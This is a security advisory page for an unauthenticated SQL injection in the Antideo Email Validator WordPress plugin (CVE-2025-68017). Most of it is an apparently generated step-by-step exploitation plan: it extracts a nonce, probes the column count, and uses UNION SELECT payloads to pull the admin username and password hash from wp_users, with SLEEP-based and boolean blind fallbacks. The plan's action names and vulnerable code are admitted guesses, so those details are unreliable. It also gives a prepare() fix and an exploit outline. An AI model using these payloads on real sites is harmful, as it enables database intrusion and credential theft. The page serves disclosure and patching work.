Antideo Email Validator <= 1.0.10 - Unauthenticated SQL Injection
Description
The Antideo Email Validator plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=1.0.10This research plan outlines the systematic exploitation of **CVE-2025-68017**, an unauthenticated SQL Injection vulnerability in the **Antideo Email Validator** plugin (<= 1.0.10). --- ### 1. Vulnerability Summary The Antideo Email Validator plugin fails to properly sanitize or prepare user-suppli…
Show full research plan
This research plan outlines the systematic exploitation of CVE-2025-68017, an unauthenticated SQL Injection vulnerability in the Antideo Email Validator plugin (<= 1.0.10).
1. Vulnerability Summary
The Antideo Email Validator plugin fails to properly sanitize or prepare user-supplied parameters before incorporating them into SQL queries. Specifically, in versions up to 1.0.10, an unauthenticated AJAX handler uses direct string concatenation or insufficient escaping when querying the plugin's internal log or validation tables. This allows an attacker to manipulate the SQL statement, enabling data extraction from the WordPress database (e.g., wp_users table).
2. Attack Vector Analysis
- Endpoint:
wp-admin/admin-ajax.php - Action (Inferred):
antideo_email_validator_checkorantideo_email_validator_lookup(The plugin typically registers awp_ajax_nopriv_hook to allow frontend users to check emails). - Vulnerable Parameter: Likely
emailor alog_idparameter. - Authentication: Unauthenticated (no account required).
- Preconditions: The plugin must be active. A valid AJAX nonce may be required depending on the specific implementation of the public-facing validator.
3. Code Flow (Inferred)
- Request: An unauthenticated user sends a POST request to
admin-ajax.phpwith anactionassociated with the Antideo validator. - Hook: The
wp_ajax_nopriv_[action]hook triggers the handler function (likely located inincludes/class-antideo-email-validator-public.phpor the main plugin file). - Extraction: The handler retrieves user input via
$_POST['email']or$_GET['email']. - Vulnerable Sink: The input is passed directly into a query like:
$wpdb->get_results("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '" . $_POST['email'] . "'"); - Execution: The database executes the injected SQL, and if the output is reflected in the AJAX response, data is exfiltrated.
4. Nonce Acquisition Strategy
The plugin likely uses wp_localize_script to pass a nonce to the frontend for the AJAX request.
- Identify Shortcode: Locate the shortcode used to display the email validator (e.g.,
[antideo-email-validator]). - Create Test Page:
wp post create --post_type=page --post_title="Validator" --post_status=publish --post_content='[antideo-email-validator]' - Extract Nonce:
- Navigate to the newly created page using
browser_navigate. - Identify the localized JavaScript object. Search the source for
wp_localize_scriptoutput. - Common identifiers in this plugin:
antideo_email_validator_objorantideo_v. - Use
browser_evalto extract the nonce:// Example (adjust based on actual JS object found in source) window.antideo_email_validator_obj?.nonce
- Navigate to the newly created page using
5. Exploitation Strategy
We will use a UNION-based SQL injection to extract the administrator's username and password hash.
- Step 1: Determine Column Count
Send requests incrementing theORDER BYcount until an error occurs.- Payload:
email=test@example.com' ORDER BY 1-- -
- Payload:
- Step 2: Identify Reflected Columns
Use a UNION SELECT with identifiable strings.- Payload:
email=invalid' UNION SELECT 1,2,'REFLECTED_3',4,5,6-- -
- Payload:
- Step 3: Extract Admin Data
Once the column count and reflected position are known (e.g., position 3), extract user data.- Request Type:
POSTviahttp_request. - URL:
http://localhost:8080/wp-admin/admin-ajax.php - Content-Type:
application/x-www-form-urlencoded - Body:
action=[ACTION_NAME]&security=[NONCE]&email=x' UNION SELECT 1,2,CONCAT(user_login,0x3a,user_pass),4,5... FROM wp_users WHERE ID=1-- -
- Request Type:
6. Test Data Setup
- Activate Plugin:
wp plugin activate antideo-email-validator - Create Target Data: Ensure an admin user exists (default is usually ID 1).
- Generate Logs (Optional): Perform one legitimate email check through the UI to ensure the log table is populated, which sometimes helps in stabilizing UNION queries.
- Shortcode Page: As described in Section 4.
7. Expected Results
- Success Indicator: The AJAX response contains the concatenated string
admin:$P$B...(the hash). - Response Format: Likely a JSON object where one of the fields contains the injected data.
- Error Case: If UNION is blocked or column count is wrong, the response may be empty or contain a database error (if
WP_DEBUGis on).
8. Verification Steps
After the exploit attempt, verify the extracted data matches the database:
# Verify the hash for the admin user
wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID = 1"
Compare the output of this command with the string retrieved via the SQL injection.
9. Alternative Approaches
If UNION-based injection is not possible (e.g., no reflected output):
- Time-Based Blind: Use
SLEEP(5)to confirm the injection.email=x' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
- Boolean-Based Blind: Check for differences in response when querying
... AND 1=1vs... AND 1=2. - Action Discovery: If the inferred action name is wrong, use
grep -r "wp_ajax_nopriv" wp-content/plugins/antideo-email-validator/to find the correct registration.
Summary
The Antideo Email Validator plugin for WordPress is vulnerable to unauthenticated SQL Injection because it concatenates user-supplied parameters directly into SQL queries without using prepared statements. Attackers can exploit this to extract sensitive information from the WordPress database, including administrative credentials.
Vulnerable Code
// Likely in a file such as includes/class-antideo-email-validator-public.php or the main plugin file // The handler retrieves user input and concatenates it into a query sink. $email = $_POST['email']; $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '" . $email . "'");
Security Fix
@@ -1,1 +1,1 @@ -$results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '" . $_POST['email'] . "'"); +$results = $wpdb->get_results($wpdb->prepare("SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = %s", $_POST['email']));
Exploit Outline
The exploit targets the AJAX endpoint used for frontend email validation. 1. Locate a page containing the plugin's email validator shortcode to extract a valid AJAX nonce from the localized JavaScript objects (e.g., antideo_email_validator_obj). 2. Send a POST request to /wp-admin/admin-ajax.php with the 'action' set to the plugin's validation handler. 3. Provide the 'email' parameter containing a SQL Injection payload, such as a UNION SELECT statement (e.g., "' UNION SELECT 1,2,user_pass,4,5 FROM wp_users WHERE ID=1-- -"). 4. The plugin executes the concatenated query and returns the results in the JSON response, allowing the attacker to view the extracted database content, such as password hashes.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.